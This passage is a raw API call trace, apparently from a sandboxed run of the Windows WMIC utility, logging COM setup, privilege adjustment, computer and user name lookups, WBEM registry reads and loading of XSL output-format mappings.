0x2a7bc0 [0179.614] malloc (_Size=0x30) returned 0x2a7c00 [0179.614] ??0CHString@@QEAA@XZ () returned 0xff5f2f58 [0179.614] malloc (_Size=0x30) returned 0x2a7c40 [0179.614] ?Empty@CHString@@QEAAXXZ () returned 0x7fef931482c [0179.614] SetConsoleCtrlHandler (HandlerRoutine=0xff5c5724, Add=1) returned 1 [0179.614] _onexit (_Func=0xff5df378) returned 0xff5df378 [0179.614] _onexit (_Func=0xff5df490) returned 0xff5df490 [0179.614] _onexit (_Func=0xff5df4d0) returned 0xff5df4d0 [0179.614] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0179.615] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0179.619] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0179.678] CoCreateInstance (in: rclsid=0xff5873a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff587370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff5f2940 | out: ppv=0xff5f2940*=0x1e61390) returned 0x0 [0180.347] GetCurrentProcess () returned 0xffffffffffffffff [0180.347] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1cf740 | out: TokenHandle=0x1cf740*=0xf4) returned 1 [0180.347] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cf738 | out: TokenInformation=0x0, ReturnLength=0x1cf738) returned 0 [0180.348] malloc (_Size=0x118) returned 0x2a63c0 [0180.348] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x2a63c0, TokenInformationLength=0x118, ReturnLength=0x1cf738 | out: TokenInformation=0x2a63c0, ReturnLength=0x1cf738) returned 1 [0180.348] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x2a63c0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-611267033, Attributes=0x33f1), (Luid.LowPart=0x0, Luid.HighPart=4382640, Attributes=0x0), (Luid.LowPart=0x67006f, Luid.HighPart=6357106, Attributes=0x46006d), (Luid.LowPart=0x730065, Luid.HighPart=4390973, Attributes=0x5c003a), (Luid.LowPart=0x67006f, Luid.HighPart=6357106, Attributes=0x20006d), (Luid.LowPart=0x65006c, Luid.HighPart=6029427, Attributes=0x6f0043))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0180.348] free (_Block=0x2a63c0) [0180.348] CloseHandle (hObject=0xf4) returned 1 [0180.490] malloc (_Size=0x40) returned 0x2a63c0 [0180.490] malloc (_Size=0x40) returned 0x2a6410 [0180.490] malloc (_Size=0x40) returned 0x2a6460 [0180.490] malloc (_Size=0x20a) returned 0x2a64b0 [0180.490] GetSystemDirectoryW (in: lpBuffer=0x2a64b0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0180.490] free (_Block=0x2a64b0) [0180.490] malloc (_Size=0x18) returned 0x2a7fb0 [0180.490] malloc (_Size=0x18) returned 0x42dfb0 [0180.490] malloc (_Size=0x18) returned 0x2a64b0 [0180.490] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0180.490] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0180.491] free (_Block=0x2a7fb0) [0180.491] free (_Block=0x42dfb0) [0180.491] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0180.491] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0180.491] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0180.492] FreeLibrary (hLibModule=0x77940000) returned 1 [0180.492] free (_Block=0x2a64b0) [0180.492] _vsnwprintf (in: _Buffer=0x2a6460, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x1cf368 | out: _Buffer="ms_409") returned 6 [0180.492] malloc (_Size=0x20) returned 0x2a64b0 [0180.492] GetComputerNameW (in: lpBuffer=0x2a64b0, nSize=0x1cf740 | out: lpBuffer="XDUWTFONO", nSize=0x1cf740) returned 1 [0180.492] lstrlenW (lpString="XDUWTFONO") returned 9 [0180.492] malloc (_Size=0x14) returned 0x42dfb0 [0180.492] lstrlenW (lpString="XDUWTFONO") returned 9 [0180.492] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x1cf738 | out: lpNameBuffer=0x0, nSize=0x1cf738) returned 0x7fffffde000 [0180.494] GetLastError () returned 0xea [0180.494] malloc (_Size=0x40) returned 0x2a64e0 [0180.494] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2a64e0, nSize=0x1cf738 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cf738) returned 0x1 [0180.495] lstrlenW (lpString="") returned 0 [0180.495] lstrlenW (lpString="XDUWTFONO") returned 9 [0180.495] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0180.498] lstrlenW (lpString=".") returned 1 [0180.498] lstrlenW (lpString="XDUWTFONO") returned 9 [0180.498] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0180.498] lstrlenW (lpString="LOCALHOST") returned 9 [0180.498] lstrlenW (lpString="XDUWTFONO") returned 9 [0180.498] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0180.499] lstrlenW (lpString="XDUWTFONO") returned 9 [0180.499] lstrlenW (lpString="XDUWTFONO") returned 9 [0180.499] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0180.499] free (_Block=0x42dfb0) [0180.499] lstrlenW (lpString="XDUWTFONO") returned 9 [0180.499] malloc (_Size=0x14) returned 0x42dfb0 [0180.499] lstrlenW (lpString="XDUWTFONO") returned 9 [0180.499] lstrlenW (lpString="XDUWTFONO") returned 9 [0180.499] malloc (_Size=0x14) returned 0x2a7fb0 [0180.499] lstrlenW (lpString="XDUWTFONO") returned 9 [0180.499] malloc (_Size=0x8) returned 0x2a6530 [0180.499] malloc (_Size=0x18) returned 0x2a6550 [0180.499] malloc (_Size=0x30) returned 0x2a6570 [0180.499] malloc (_Size=0x18) returned 0x2a65b0 [0180.499] SysStringLen (param_1="IDENTIFY") returned 0x8 [0180.499] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0180.499] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0180.499] SysStringLen (param_1="IDENTIFY") returned 0x8 [0180.499] malloc (_Size=0x30) returned 0x2a65d0 [0180.499] malloc (_Size=0x18) returned 0x2a6610 [0180.500] SysStringLen (param_1="IMPERSONATE") returned 0xb [0180.500] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0180.500] SysStringLen (param_1="IMPERSONATE") returned 0xb [0180.500] SysStringLen (param_1="IDENTIFY") returned 0x8 [0180.500] SysStringLen (param_1="IDENTIFY") returned 0x8 [0180.500] SysStringLen (param_1="IMPERSONATE") returned 0xb [0180.500] malloc (_Size=0x30) returned 0x2a6630 [0180.500] malloc (_Size=0x18) returned 0x2a6670 [0180.500] SysStringLen (param_1="DELEGATE") returned 0x8 [0180.500] SysStringLen (param_1="IDENTIFY") returned 0x8 [0180.500] SysStringLen (param_1="DELEGATE") returned 0x8 [0180.500] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0180.500] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0180.500] SysStringLen (param_1="DELEGATE") returned 0x8 [0180.500] malloc (_Size=0x30) returned 0x2a6690 [0180.500] malloc (_Size=0x18) returned 0x2a66d0 [0180.500] malloc (_Size=0x30) returned 0x2a66f0 [0180.500] malloc (_Size=0x18) returned 0x2a6730 [0180.500] SysStringLen (param_1="NONE") returned 0x4 [0180.500] SysStringLen (param_1="DEFAULT") returned 0x7 [0180.500] SysStringLen (param_1="DEFAULT") returned 0x7 [0180.500] SysStringLen (param_1="NONE") returned 0x4 [0180.500] malloc (_Size=0x30) returned 0x2a6750 [0180.500] malloc (_Size=0x18) returned 0x2a6790 [0180.500] SysStringLen (param_1="CONNECT") returned 0x7 [0180.500] SysStringLen (param_1="DEFAULT") returned 0x7 [0180.501] malloc (_Size=0x30) returned 0x2a67b0 [0180.501] malloc (_Size=0x18) returned 0x2a67f0 [0180.501] SysStringLen (param_1="CALL") returned 0x4 [0180.501] SysStringLen (param_1="DEFAULT") returned 0x7 [0180.501] SysStringLen (param_1="CALL") returned 0x4 [0180.501] SysStringLen (param_1="CONNECT") returned 0x7 [0180.501] malloc (_Size=0x30) returned 0x2a6810 [0180.501] malloc (_Size=0x18) returned 0x2a6850 [0180.501] SysStringLen (param_1="PKT") returned 0x3 [0180.501] SysStringLen (param_1="DEFAULT") returned 0x7 [0180.501] SysStringLen (param_1="PKT") returned 0x3 [0180.501] SysStringLen (param_1="NONE") returned 0x4 [0180.501] SysStringLen (param_1="NONE") returned 0x4 [0180.501] SysStringLen (param_1="PKT") returned 0x3 [0180.501] malloc (_Size=0x30) returned 0x2a6870 [0180.501] malloc (_Size=0x18) returned 0x2a68b0 [0180.501] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0180.501] SysStringLen (param_1="DEFAULT") returned 0x7 [0180.501] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0180.501] SysStringLen (param_1="NONE") returned 0x4 [0180.501] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0180.501] SysStringLen (param_1="PKT") returned 0x3 [0180.501] SysStringLen (param_1="PKT") returned 0x3 [0180.501] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0180.501] malloc (_Size=0x30) returned 0x2a8000 [0180.503] malloc (_Size=0x18) returned 0x2a6cd0 [0180.503] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0180.503] SysStringLen (param_1="DEFAULT") returned 0x7 [0180.503] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0180.503] SysStringLen (param_1="PKT") returned 0x3 [0180.503] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0180.503] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0180.503] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0180.503] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0180.503] malloc (_Size=0x30) returned 0x2a8040 [0180.503] malloc (_Size=0x40) returned 0x2a6cf0 [0180.503] malloc (_Size=0x20a) returned 0x2a8fd0 [0180.503] GetSystemDirectoryW (in: lpBuffer=0x2a8fd0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0180.503] free (_Block=0x2a8fd0) [0180.503] malloc (_Size=0x18) returned 0x2a6d40 [0180.503] malloc (_Size=0x18) returned 0x2a6d60 [0180.503] malloc (_Size=0x18) returned 0x2a6d80 [0180.504] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0180.504] SysStringLen (param_1="\\wbem\\") returned 0x6 [0180.504] free (_Block=0x2a6d40) [0180.504] free (_Block=0x2a6d60) [0180.504] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0180.504] free (_Block=0x2a6d80) [0180.504] malloc (_Size=0x18) returned 0x2a6d40 [0180.504] malloc (_Size=0x18) returned 0x2a6d60 [0180.504] malloc (_Size=0x18) returned 0x2a6d80 [0180.504] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0180.504] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0180.504] free (_Block=0x2a6d40) [0180.504] free (_Block=0x2a6d60) [0180.504] GetCurrentThreadId () returned 0xa44 [0180.505] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x1cf040 | out: phkResult=0x1cf040*=0xf8) returned 0x0 [0180.505] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x1cf090, lpcbData=0x1cf030*=0x400 | out: lpType=0x0, lpData=0x1cf090*=0x30, lpcbData=0x1cf030*=0x4) returned 0x0 [0180.505] _wcsicmp (_String1="0", _String2="1") returned -1 [0180.505] _wcsicmp (_String1="0", _String2="2") returned -2 [0180.505] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1cf030*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x1cf030*=0x42) returned 0x0 [0180.505] malloc (_Size=0x86) returned 0x2a6da0 [0180.505] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x2a6da0, lpcbData=0x1cf030*=0x42 | out: lpType=0x0, lpData=0x2a6da0*=0x25, lpcbData=0x1cf030*=0x42) returned 0x0 [0180.505] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0180.505] malloc (_Size=0x42) returned 0x2a6e30 [0180.505] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0180.505] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x1cf090, lpcbData=0x1cf030*=0x400 | out: lpType=0x0, lpData=0x1cf090*=0x36, lpcbData=0x1cf030*=0xc) returned 0x0 [0180.505] _wtol (_String="65536") returned 65536 [0180.505] free (_Block=0x2a6da0) [0180.505] RegCloseKey (hKey=0x0) returned 0x6 [0180.505] CoCreateInstance (in: rclsid=0xff587410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff5873f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x1cf538 | out: ppv=0x1cf538*=0x23971d0) returned 0x0 [0181.128] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x23971d0, xmlSource=0x1cf680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x2a6d40), isSuccessful=0x1cf6f0 | out: isSuccessful=0x1cf6f0*=0xffff) returned 0x0 [0195.093] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x23971d0, DOMElement=0x1cf530 | out: DOMElement=0x1cf530) returned 0x0 [0195.093] malloc (_Size=0x18) returned 0x2a6d40 [0195.224] free (_Block=0x2a6d40) [0195.518] malloc (_Size=0x18) returned 0x2a6d40 [0195.518] free (_Block=0x2a6d40) [0195.518] malloc (_Size=0x18) returned 0x2a6d40 [0195.518] malloc (_Size=0x18) returned 0x2a6d60 [0195.519] malloc (_Size=0x30) returned 0x2a8080 [0195.519] malloc (_Size=0x18) returned 0x2a6e80 [0195.519] free (_Block=0x2a6e80) [0195.519] malloc (_Size=0x18) returned 0x2ac270 [0195.519] malloc (_Size=0x18) returned 0x2ac290 [0195.519] SysStringLen (param_1="VALUE") returned 0x5 [0195.519] SysStringLen (param_1="TABLE") returned 0x5 [0195.519] SysStringLen (param_1="TABLE") returned 0x5 [0195.519] SysStringLen (param_1="VALUE") returned 0x5 [0195.519] malloc (_Size=0x30) returned 0x2a80c0 [0195.520] malloc (_Size=0x18) returned 0x2ac2b0 [0195.520] free (_Block=0x2ac2b0) [0195.520] malloc (_Size=0x18) returned 0x2ac2b0 [0195.520] malloc (_Size=0x18) returned 0x2ac2d0 [0195.520] SysStringLen (param_1="LIST") returned 0x4 [0195.520] SysStringLen (param_1="TABLE") returned 0x5 [0195.520] malloc (_Size=0x30) returned 0x2a8100 [0195.520] malloc (_Size=0x18) returned 0x2ac2f0 [0195.520] free (_Block=0x2ac2f0) [0195.521] malloc (_Size=0x18) returned 0x2ac2f0 [0195.521] malloc (_Size=0x18) returned 0x2ac310 [0195.521] SysStringLen (param_1="RAWXML") returned 0x6 [0195.521] SysStringLen (param_1="TABLE") returned 0x5 [0195.521] SysStringLen (param_1="RAWXML") returned 0x6 [0195.521] SysStringLen (param_1="LIST") returned 0x4 [0195.521] SysStringLen (param_1="LIST") returned 0x4 [0195.521] SysStringLen (param_1="RAWXML") returned 0x6 [0195.521] malloc (_Size=0x30) returned 0x2a8140 [0195.521] malloc (_Size=0x18) returned 0x2ac330 [0195.521] free (_Block=0x2ac330) [0195.521] malloc (_Size=0x18) returned 0x2ac330 [0195.522] malloc (_Size=0x18) returned 0x2ac350 [0195.522] SysStringLen (param_1="HTABLE") returned 0x6 [0195.522] SysStringLen (param_1="TABLE") returned 0x5 [0195.522] SysStringLen (param_1="HTABLE") returned 0x6 [0195.522] SysStringLen (param_1="LIST") returned 0x4 [0195.522] malloc (_Size=0x30) returned 0x2a8180 [0195.522] malloc (_Size=0x18) returned 0x2ac370 [0195.522] free (_Block=0x2ac370) [0195.522] malloc (_Size=0x18) returned 0x2ac370 [0195.522] malloc (_Size=0x18) returned 0x2ac390 [0195.522] SysStringLen (param_1="HFORM") returned 0x5 [0195.522] SysStringLen (param_1="TABLE") returned 0x5 [0195.522] SysStringLen (param_1="HFORM") returned 0x5 [0195.522] SysStringLen (param_1="LIST") returned 0x4 [0195.522] SysStringLen (param_1="HFORM") returned 0x5 [0195.522] SysStringLen (param_1="HTABLE") returned 0x6 [0195.523] malloc (_Size=0x30) returned 0x2a81c0 [0195.523] malloc (_Size=0x18) returned 0x2ac3b0 [0195.523] free (_Block=0x2ac3b0) [0195.523] malloc (_Size=0x18) returned 0x2ac3b0 [0195.523] malloc (_Size=0x18) returned 0x2ac3d0 [0195.523] SysStringLen (param_1="XML") returned 0x3 [0195.523] SysStringLen (param_1="TABLE") returned 0x5 [0195.523] SysStringLen (param_1="XML") returned 0x3 [0195.523] SysStringLen (param_1="VALUE") returned 0x5 [0195.523] SysStringLen (param_1="VALUE") returned 0x5 [0195.523] SysStringLen (param_1="XML") returned 0x3 [0195.523] malloc (_Size=0x30) returned 0x2a8200 [0195.523] malloc (_Size=0x18) returned 0x2ac3f0 [0195.524] free (_Block=0x2ac3f0) [0195.524] malloc (_Size=0x18) returned 0x2ac3f0 [0195.524] malloc (_Size=0x18) returned 0x2ac410 [0195.524] SysStringLen (param_1="MOF") returned 0x3 [0195.524] SysStringLen (param_1="TABLE") returned 0x5 [0195.524] SysStringLen (param_1="MOF") returned 0x3 [0195.524] SysStringLen (param_1="LIST") returned 0x4 [0195.524] SysStringLen (param_1="MOF") returned 0x3 [0195.524] SysStringLen (param_1="RAWXML") returned 0x6 [0195.524] SysStringLen (param_1="LIST") returned 0x4 [0195.524] SysStringLen (param_1="MOF") returned 0x3 [0195.524] malloc (_Size=0x30) returned 0x2a8240 [0195.524] malloc (_Size=0x18) returned 0x2ac430 [0195.524] free (_Block=0x2ac430) [0195.525] malloc (_Size=0x18) returned 0x2ac430 [0195.525] malloc (_Size=0x18) returned 0x2ac450 [0195.525] SysStringLen (param_1="CSV") returned 0x3 [0195.525] SysStringLen (param_1="TABLE") returned 0x5 [0195.525] SysStringLen (param_1="CSV") returned 0x3 [0195.525] SysStringLen (param_1="LIST") returned 0x4 [0195.525] SysStringLen (param_1="CSV") returned 0x3 [0195.525] SysStringLen (param_1="HTABLE") returned 0x6 [0195.525] SysStringLen (param_1="CSV") returned 0x3 [0195.525] SysStringLen (param_1="HFORM") returned 0x5 [0195.525] malloc (_Size=0x30) returned 0x2a8280 [0195.525] malloc (_Size=0x18) returned 0x2ac470 [0195.525] free (_Block=0x2ac470) [0195.525] malloc (_Size=0x18) returned 0x2ac470 [0195.525] malloc (_Size=0x18) returned 0x2ac490 [0195.526] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0195.526] SysStringLen (param_1="TABLE") returned 0x5 [0195.526] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0195.526] SysStringLen (param_1="VALUE") returned 0x5 [0195.526] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0195.526] SysStringLen (param_1="XML") returned 0x3 [0195.526] SysStringLen (param_1="XML") returned 0x3 [0195.526] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0195.526] malloc (_Size=0x30) returned 0x2a82c0 [0195.526] malloc (_Size=0x18) returned 0x2ac4b0 [0195.526] free (_Block=0x2ac4b0) [0195.526] malloc (_Size=0x18) returned 0x2ac4b0 [0195.526] malloc (_Size=0x18) returned 0x2ac4d0 [0195.526] SysStringLen (param_1="texttablewsys") returned 0xd [0195.526] SysStringLen (param_1="TABLE") returned 0x5 [0195.526] SysStringLen (param_1="texttablewsys") returned 0xd [0195.526] SysStringLen (param_1="XML") returned 0x3 [0195.527] SysStringLen (param_1="texttablewsys") returned 0xd [0195.527] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0195.527] SysStringLen (param_1="XML") returned 0x3 [0195.527] SysStringLen (param_1="texttablewsys") returned 0xd [0195.527] malloc (_Size=0x30) returned 0x2a8300 [0195.527] malloc (_Size=0x18) returned 0x2ac4f0 [0195.527] free (_Block=0x2ac4f0) [0195.527] malloc (_Size=0x18) returned 0x2ac4f0 [0195.527] malloc (_Size=0x18) returned 0x2ac510 [0195.527] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0195.527] SysStringLen (param_1="TABLE") returned 0x5 [0195.527] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0195.527] SysStringLen (param_1="XML") returned 0x3 [0195.527] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0195.527] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0195.527] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0195.527] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0195.528] malloc (_Size=0x30) returned 0x2a8340 [0195.528] malloc (_Size=0x18) returned 0x2ac530 [0195.528] free (_Block=0x2ac530) [0195.528] malloc (_Size=0x18) returned 0x2ac530 [0195.528] malloc (_Size=0x18) returned 0x2ac550 [0195.528] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0195.528] SysStringLen (param_1="TABLE") returned 0x5 [0195.528] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0195.528] SysStringLen (param_1="XML") returned 0x3 [0195.528] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0195.528] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0195.528] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0195.528] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0195.528] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0195.528] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0195.528] malloc (_Size=0x30) returned 0x2a8380 [0195.529] malloc (_Size=0x18) returned 0x2ac570 [0195.529] free (_Block=0x2ac570) [0195.529] malloc (_Size=0x18) returned 0x2ac570 [0195.529] malloc (_Size=0x18) returned 0x2ac590 [0195.529] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0195.529] SysStringLen (param_1="TABLE") returned 0x5 [0195.529] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0195.529] SysStringLen (param_1="XML") returned 0x3 [0195.529] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0195.529] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0195.529] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0195.529] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0195.529] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0195.529] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0195.529] malloc (_Size=0x30) returned 0x2a83c0 [0195.530] malloc (_Size=0x18) returned 0x2ac5b0 [0195.530] free (_Block=0x2ac5b0) [0195.530] malloc (_Size=0x18) returned 0x2ac5b0 [0195.530] malloc (_Size=0x18) returned 0x2ac5d0 [0195.530] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0195.530] SysStringLen (param_1="TABLE") returned 0x5 [0195.530] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0195.530] SysStringLen (param_1="XML") returned 0x3 [0195.530] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0195.530] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0195.530] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0195.530] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0195.530] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0195.530] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0195.530] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0195.530] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0195.530] malloc (_Size=0x30) returned 0x2a8400 [0195.531] malloc (_Size=0x18) returned 0x2ac5f0 [0195.531] free (_Block=0x2ac5f0) [0195.531] malloc (_Size=0x18) returned 0x2ac5f0 [0195.531] malloc (_Size=0x18) returned 0x2ac610 [0195.531] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0195.531] SysStringLen (param_1="TABLE") returned 0x5 [0195.531] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0195.531] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0195.531] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0195.531] SysStringLen (param_1="XML") returned 0x3 [0195.531] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0195.531] SysStringLen (param_1="texttablewsys") returned 0xd [0195.531] SysStringLen (param_1="XML") returned 0x3 [0195.531] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0195.531] malloc (_Size=0x30) returned 0x2a8440 [0195.532] malloc (_Size=0x18) returned 0x2ac630 [0195.532] free (_Block=0x2ac630) [0195.532] malloc (_Size=0x18) returned 0x2ac630 [0195.532] malloc (_Size=0x18) returned 0x2ac650 [0195.532] SysStringLen (param_1="htable-sortby") returned 0xd [0195.532] SysStringLen (param_1="TABLE") returned 0x5 [0195.532] SysStringLen (param_1="htable-sortby") returned 0xd [0195.532] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0195.532] SysStringLen (param_1="htable-sortby") returned 0xd [0195.532] SysStringLen (param_1="XML") returned 0x3 [0195.532] SysStringLen (param_1="htable-sortby") returned 0xd [0195.532] SysStringLen (param_1="texttablewsys") returned 0xd [0195.532] SysStringLen (param_1="htable-sortby") returned 0xd [0195.532] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0195.532] SysStringLen (param_1="XML") returned 0x3 [0195.532] SysStringLen (param_1="htable-sortby") returned 0xd [0195.532] malloc (_Size=0x30) returned 0x2a8480 [0195.533] malloc (_Size=0x18) returned 0x2ac670 [0195.533] free (_Block=0x2ac670) [0195.533] malloc (_Size=0x18) returned 0x2ac670 [0195.533] malloc (_Size=0x18) returned 0x2ac690 [0195.533] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0195.533] SysStringLen (param_1="TABLE") returned 0x5 [0195.533] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0195.533] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0195.533] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0195.533] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0195.533] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0195.533] SysStringLen (param_1="wmiclitableformat") returned 0x11 